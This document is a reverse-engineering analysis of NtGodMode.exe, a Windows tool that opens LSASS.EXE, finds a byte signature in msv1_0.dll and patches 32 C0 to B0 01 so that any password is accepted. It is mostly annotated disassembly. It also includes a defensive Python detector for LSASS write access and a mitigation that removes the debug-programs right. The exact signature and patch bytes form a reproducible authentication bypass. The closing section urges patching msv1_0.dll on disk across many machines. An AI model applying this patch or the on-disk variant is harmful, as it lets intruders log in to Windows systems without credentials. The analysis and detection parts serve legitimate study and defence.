Analysis of what NtGodMode.exe does
by http://tmdnet.nothave.com
NtGodModex.exe http://www.xfocus.net/tools/200804/1272.html
NtGodMode.exe 9.00 KB (9,216 bytes): UPX-packed; unpacked directly with OllyDbg, steps omitted
NtGodMode~.exe 120 KB (123,392 bytes): inspected with a PE tool, written in Delphi
00403220 > 55 PUSH EBP
00403221 8BEC MOV EBP,ESP
00403223 B9 0D000000 MOV ECX,0D
00403228 6A 00 PUSH 0
0040322A 6A 00 PUSH 0
0040322C 49 DEC ECX
0040322D ^ 75 F9 JNZ SHORT NtGodMod.00403228
0040322F 51 PUSH ECX
00403230 53 PUSH EBX
00403231 56 PUSH ESI
00403232 57 PUSH EDI
00403233 A1 9C404000 MOV EAX,DWORD PTR DS:[40409C]
00403238 C600 01 MOV BYTE PTR DS:[EAX],1
0040323B B8 C0314000 MOV EAX,NtGodMod.004031C0
00403240 E8 13EEFFFF CALL NtGodMod.00402058 // get a handle (base address) to its own process
00403245 BB 60574000 MOV EBX,NtGodMod.00405760
0040324A 33C0 XOR EAX,EAX
0040324C 55 PUSH EBP
0040324D 68 80384000 PUSH NtGodMod.00403880
00403252 64:FF30 PUSH DWORD PTR FS:[EAX]
00403255 64:8920 MOV DWORD PTR FS:[EAX],ESP
00403258 E8 1BF2FFFF CALL NtGodMod.00402478
0040325D 48 DEC EAX
0040325E 7D 61 JGE SHORT NtGodMod.004032C1 // ->>004032C1
00403260 E8 4FFEFFFF CALL NtGodMod.004030B4
00403265 68 98384000 PUSH NtGodMod.00403898 ; ASCII "Usage: "
0040326A 8D55 E4 LEA EDX,DWORD PTR SS:[EBP-1C]
0040326D 33C0 XOR EAX,EAX
0040326F E8 F8F0FFFF CALL NtGodMod.0040236C
00403274 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
00403277 8D55 E8 LEA EDX,DWORD PTR SS:[EBP-18]
0040327A E8 11F4FFFF CALL NtGodMod.00402690
0040327F FF75 E8 PUSH DWORD PTR SS:[EBP-18]
00403282 68 A8384000 PUSH NtGodMod.004038A8 ; ASCII " ON|OFF"
00403287 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
0040328A BA 03000000 MOV EDX,3
0040328F E8 70E9FFFF CALL NtGodMod.00401C04
///////////////////////////////////////////////////////////////////////////////////////////////////
004032C1 A1 8C404000 MOV EAX,DWORD PTR DS:[40408C]
004032C6 E8 61EAFFFF CALL NtGodMod.00401D2C
004032CB 50 PUSH EAX //msv1_0.dll
004032CC E8 BFEEFFFF CALL <JMP.&kernel32.LoadLibraryA> //LoadLibrary("msv1_0.dll")
004032D1 A3 4C574000 MOV DWORD PTR DS:[40574C],EAX // save the msv1_0.dll base address
004032D6 833D 4C574000 0>CMP DWORD PTR DS:[40574C],0
004032DD 0F84 82050000 JE NtGodMod.00403865
004032E3 33C0 XOR EAX,EAX
004032E5 A3 50574000 MOV DWORD PTR DS:[405750],EAX
004032EA A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
004032EF 8903 MOV DWORD PTR DS:[EBX],EAX
004032F1 33C0 XOR EAX,EAX
004032F3 55 PUSH EBP
004032F4 68 50334000 PUSH NtGodMod.00403350
004032F9 64:FF30 PUSH DWORD PTR FS:[EAX]
004032FC 64:8920 MOV DWORD PTR FS:[EAX],ESP
004032FF 8B03 MOV EAX,DWORD PTR DS:[EBX] // msv1_0.dll base address
00403301 8038 8B CMP BYTE PTR DS:[EAX],8B
00403304 75 1C JNZ SHORT NtGodMod.00403322
00403306 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403308 40 INC EAX
00403309 8038 4D CMP BYTE PTR DS:[EAX],4D
0040330C 75 14 JNZ SHORT NtGodMod.00403322
0040330E 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403310 83C0 02 ADD EAX,2
00403313 8038 0C CMP BYTE PTR DS:[EAX],0C
00403316 75 0A JNZ SHORT NtGodMod.00403322
00403318 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040331A 83C0 03 ADD EAX,3
0040331D 8038 49 CMP BYTE PTR DS:[EAX],49 // search msv1_0.dll's address space for the signature 8B 4D 0C 49
00403320 74 04 JE SHORT NtGodMod.00403326 // if found, keep scanning forward from there for 32 C0
00403322 FF03 INC DWORD PTR DS:[EBX]
00403324 ^ EB D9 JMP SHORT NtGodMod.004032FF
00403326 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403328 8038 32 CMP BYTE PTR DS:[EAX],32
0040332B 75 11 JNZ SHORT NtGodMod.0040333E
0040332D 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040332F 40 INC EAX
00403330 8038 C0 CMP BYTE PTR DS:[EAX],0C0
00403333 75 09 JNZ SHORT NtGodMod.0040333E
00403335 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403337 A3 50574000 MOV DWORD PTR DS:[405750],EAX // save the address found in [405750]
0040333C EB 04 JMP SHORT NtGodMod.00403342
0040333E FF03 INC DWORD PTR DS:[EBX] // advance the pointer by 1
00403340 ^ EB E4 JMP SHORT NtGodMod.00403326
00403342 33C0 XOR EAX,EAX
00403344 5A POP EDX
00403345 59 POP ECX
00403346 59 POP ECX
00403347 64:8910 MOV DWORD PTR FS:[EAX],EDX
0040334A 68 57334000 PUSH NtGodMod.00403357
0040334F C3 RETN
00403357 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
0040335C 2B05 4C574000 SUB EAX,DWORD PTR DS:[40574C] // address found above minus the msv1_0.dll base address gives the offset of the signature
00403362 A3 50574000 MOV DWORD PTR DS:[405750],EAX //offset ->[405750]
00403367 A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
0040336C 50 PUSH EAX
0040336D E8 E6EDFFFF CALL <JMP.&kernel32.FreeLibrary>
00403372 C605 9C584000 0>MOV BYTE PTR DS:[40589C],0
00403379 C605 91584000 0>MOV BYTE PTR DS:[405891],0
00403380 C605 9D584000 0>MOV BYTE PTR DS:[40589D],0
00403387 E8 28FDFFFF CALL NtGodMod.004030B4 // display author info
0040338C 8D55 DC LEA EDX,DWORD PTR SS:[EBP-24]
0040338F B8 02000000 MOV EAX,2
00403394 E8 D3EFFFFF CALL NtGodMod.0040236C
.
.
.
/////////////////////////////////////////////////////////////////////////////////////////////
// grant itself the debug privilege (SeDebugPrivilege)
http://tmdnet.nothave.com/tmp/NtGodMode.txt
00402F1C 53 PUSH EBX ; NtGodMod.00405760
00402F1D 83C4 E8 ADD ESP,-18
00402F20 33DB XOR EBX,EBX
00402F22 54 PUSH ESP
00402F23 6A 28 PUSH 28
00402F25 E8 3EF2FFFF CALL <JMP.&kernel32.GetCurrentProcess>
00402F2A 50 PUSH EAX
00402F2B E8 F8F1FFFF CALL <JMP.&advapi32.OpenProcessToken>
00402F30 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
00402F34 50 PUSH EAX
00402F35 68 7C2F4000 PUSH NtGodMod.00402F7C ; ASCII "SeDebugPrivilege"
00402F3A 6A 00 PUSH 0
00402F3C E8 DFF1FFFF CALL <JMP.&advapi32.LookupPrivilegeValueA>
00402F41 85C0 TEST EAX,EAX
00402F43 74 30 JE SHORT NtGodMod.00402F75
00402F45 C74424 08 01000>MOV DWORD PTR SS:[ESP+8],1
00402F4D C74424 14 02000>MOV DWORD PTR SS:[ESP+14],2
00402F55 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
00402F59 50 PUSH EAX
00402F5A 6A 00 PUSH 0
00402F5C 6A 10 PUSH 10
00402F5E 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00402F62 50 PUSH EAX
00402F63 6A 00 PUSH 0
00402F65 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00402F69 50 PUSH EAX
00402F6A E8 A9F1FFFF CALL <JMP.&advapi32.AdjustTokenPrivileges>
00402F6F 83F8 01 CMP EAX,1
00402F72 1BDB SBB EBX,EBX
00402F74 43 INC EBX
00402F75 8BC3 MOV EAX,EBX
00402F77 83C4 18 ADD ESP,18
00402F7A 5B POP EBX
00402F7B C3 RETN
///////////////////////////////////////////////////////////////////////////////////////////////
.
. // this section obtains the PID from the process name (LSASS.EXE); too long, omitted...
.
///////////////////////////////////////////////////////////////////////////////////////////////
0040358A 50 PUSH EAX
0040358B 6A 00 PUSH 0
0040358D 68 FF0F1F00 PUSH 1F0FFF
00403592 E8 01ECFFFF CALL <JMP.&kernel32.OpenProcess> // open the %systemroot%\system32\LSASS.EXE process
00403597 8BF0 MOV ESI,EAX
00403599 85F6 TEST ESI,ESI
0040359B 75 1E JNZ SHORT NtGodMod.004035BB
0040359D A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004035A2 BA 10394000 MOV EDX,NtGodMod.00403910 ; ASCII "Sorry. I can't DO more."
004035A7 E8 78E8FFFF CALL NtGodMod.00401E24
004035AC E8 6FE1FFFF CALL NtGodMod.00401720
004035B1 E8 3EDCFFFF CALL NtGodMod.004011F4
004035B6 E9 AA020000 JMP NtGodMod.00403865
004035BB B8 A0584000 MOV EAX,NtGodMod.004058A0
004035C0 BA 00000100 MOV EDX,10000
004035C5 E8 0EECFFFF CALL NtGodMod.004021D8
004035CA 68 A0584100 PUSH NtGodMod.004158A0
004035CF BA A0584000 MOV EDX,NtGodMod.004058A0
004035D4 B9 00000100 MOV ECX,10000
004035D9 8BC6 MOV EAX,ESI
004035DB E8 A4F8FFFF CALL NtGodMod.00402E84
004035E0 8B3D A0584100 MOV EDI,DWORD PTR DS:[4158A0]
004035E6 4F DEC EDI
004035E7 85FF TEST EDI,EDI
004035E9 0F82 D6000000 JB NtGodMod.004036C5
004035EF 47 INC EDI
004035F0 C705 58574000 0>MOV DWORD PTR DS:[405758],0
004035FA BB A0584000 MOV EBX,NtGodMod.004058A0
004035FF 833B 00 CMP DWORD PTR DS:[EBX],0
00403602 0F84 BD000000 JE NtGodMod.004036C5
00403608 C705 A4584100 C>MOV DWORD PTR DS:[4158A4],0C8
00403612 A1 A4584100 MOV EAX,DWORD PTR DS:[4158A4]
00403617 50 PUSH EAX
00403618 B9 A8584100 MOV ECX,NtGodMod.004158A8
0040361D 8B13 MOV EDX,DWORD PTR DS:[EBX]
0040361F 8BC6 MOV EAX,ESI
00403621 E8 8EF8FFFF CALL NtGodMod.00402EB4
///////////////////////////////////////////////////////////////////////////////////////////////////
00403732 68 5C574000 PUSH NtGodMod.0040575C
00403737 6A 40 PUSH 40
00403739 6A 02 PUSH 2
0040373B A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403740 50 PUSH EAX
00403741 56 PUSH ESI
00403742 E8 79EAFFFF CALL <JMP.&kernel32.VirtualProtectEx>
00403747 68 98584000 PUSH NtGodMod.00405898
0040374C 6A 02 PUSH 2
0040374E 68 90404000 PUSH NtGodMod.00404090
00403753 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403758 50 PUSH EAX
00403759 56 PUSH ESI
0040375A E8 69EAFFFF CALL <JMP.&kernel32.WriteProcessMemory> // patch 32 C0 (xor al,al) to B0 01 (mov al,1)
0040375F B0 04 MOV AL,4
00403761 E8 DEEFFFFF CALL NtGodMod.00402744
00403766 A1 98404000 MOV EAX,DWORD PTR DS:[404098]
0040376B BA 70394000 MOV EDX,NtGodMod.00403970 ; ASCII "Open God Mode!"
00403770 E8 AFE6FFFF CALL NtGodMod.00401E24
00403775 E8 A6DFFFFF CALL NtGodMod.00401720
0040377A E8 75DAFFFF CALL NtGodMod.004011F4
0040377F 33C0 XOR EAX,EAX
00403781 E8 BEEFFFFF CALL NtGodMod.00402744
00403786 EB 54 JMP SHORT NtGodMod.004037DC
00403788 68 5C574000 PUSH NtGodMod.0040575C
0040378D 6A 40 PUSH 40
0040378F 6A 02 PUSH 2
00403791 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403796 50 PUSH EAX
00403797 56 PUSH ESI
00403798 E8 23EAFFFF CALL <JMP.&kernel32.VirtualProtectEx>
0040379D 68 98584000 PUSH NtGodMod.00405898
004037A2 6A 02 PUSH 2
004037A4 68 94404000 PUSH NtGodMod.00404094
004037A9 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
004037AE 50 PUSH EAX
004037AF 56 PUSH ESI
004037B0 E8 13EAFFFF CALL <JMP.&kernel32.WriteProcessMemory>
004037B5 B0 07 MOV AL,7
004037B7 E8 88EFFFFF CALL NtGodMod.00402744
004037BC A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004037C1 BA 88394000 MOV EDX,NtGodMod.00403988 ; ASCII "Close God Mode!"
004037C6 E8 59E6FFFF CALL NtGodMod.00401E24
004037CB E8 50DFFFFF CALL NtGodMod.00401720
004037D0 E8 1FDAFFFF CALL NtGodMod.004011F4
004037D5 33C0 XOR EAX,EAX
004037D7 E8 68EFFFFF CALL NtGodMod.00402744
004037DC 6A 00 PUSH 0
004037DE 6A 00 PUSH 0
004037E0 56 PUSH ESI
004037E1 E8 6AE9FFFF CALL <JMP.&kernel32.FlushInstructionCache>
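As an added detection example (not code from the original analysis or from the NtGodMode author): the access pattern visible above, OpenProcess on LSASS.EXE with 1F0FFF at 0040358D followed by VirtualProtectEx and WriteProcessMemory, is what a defender can hunt for in process-access telemetry. The script below scans Sysmon-style Event ID 10 (ProcessAccess) records and flags any that grant the two rights the patch needs; the log lines are constructed samples, and the field layout is an assumption, not Sysmon's real XML.

```python
# Added example, not part of the original NtGodMode analysis. Flags process-access
# events against lsass.exe whose granted mask allows changing page protection and
# writing memory, i.e. the rights needed for VirtualProtectEx + WriteProcessMemory.
# The records below are constructed samples in a simplified key=value|... layout.

PROCESS_VM_OPERATION = 0x0008   # required by VirtualProtectEx
PROCESS_VM_WRITE = 0x0020       # required by WriteProcessMemory
PROCESS_ALL_ACCESS = 0x1F0FFF   # the mask NtGodMode pushes before OpenProcess
WRITE_RIGHTS = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

SAMPLE_EVENTS = [  # constructed, not real logs
    r"EventID=10|SourceImage=C:\Tools\NtGodMode.exe|TargetImage=C:\WINDOWS\system32\lsass.exe|GrantedAccess=0x1F0FFF",
    r"EventID=10|SourceImage=C:\WINDOWS\system32\svchost.exe|TargetImage=C:\WINDOWS\system32\lsass.exe|GrantedAccess=0x1000",
    r"EventID=10|SourceImage=C:\Tools\dumper.exe|TargetImage=C:\WINDOWS\system32\lsass.exe|GrantedAccess=0x1010",
    r"EventID=10|SourceImage=C:\Tools\other.exe|TargetImage=C:\WINDOWS\system32\services.exe|GrantedAccess=0x1F0FFF",
]


def parse_event(line):
    """Split a 'key=value|key=value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def grants_lsass_write(event):
    """True when the target is lsass.exe and the granted mask contains both
    PROCESS_VM_OPERATION and PROCESS_VM_WRITE, whatever other bits are set
    (0x1F0FFF is only the most obvious superset)."""
    if event.get("EventID") != "10":
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)
    return (granted & WRITE_RIGHTS) == WRITE_RIGHTS


def find_lsass_writers(lines):
    """Return (SourceImage, GrantedAccess) for each record that could patch
    LSASS memory. Read-only masks such as 0x1010 (query + VM_READ) are not
    reported by this rule; credential dumping deserves a separate one."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if grants_lsass_write(event):
            hits.append((event["SourceImage"], event["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for source, mask in find_lsass_writers(SAMPLE_EVENTS):
        print(f"lsass write access: {source} GrantedAccess={mask}")
```

Only the NtGodMode.exe record is reported; the svchost and dumper records lack write rights and the services.exe record targets the wrong process.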
Summary
NtGodMode.exe opens the LSASS.EXE process and, within the address space of its msv1_0.dll module, searches for the signature 8B 4D 0C 49 and then the first 32 C0 after it.
That 32 C0 is the opcode for xor al,al; it is patched to B0 01, the opcode for mov al,1.
Why does mov al,1 mean no password is needed from then on? Anyone interested can set up a virtual machine and debug LSASS.EXE.
On my own machine (Win2k SP4) this program does not work. I traced it: the main reason is that the signature it searches for is not universal, so it patches the wrong place.
It works on XP SP2 and XP SP3.
Also, if you want to immunize your own machine against this thing, it is actually simple: Control Panel -> Administrative Tools -> Local Security Policy -> Local Policies -> User Rights Assignment -> Debug programs.
There is an admin account listed there; once it is removed, the program's privilege-elevation code, which is very old, poor and weak, fails.
Actually, the way this thing should be used is: programmatically turn off the system's file protection and modify the msv1_0.dll PE file directly, so the machine needs no password; then, if there are many machines, accessing shared files is convenient too. Computers should be people-oriented.
One last thing: stuff written in Delphi is no good, too much junk~!!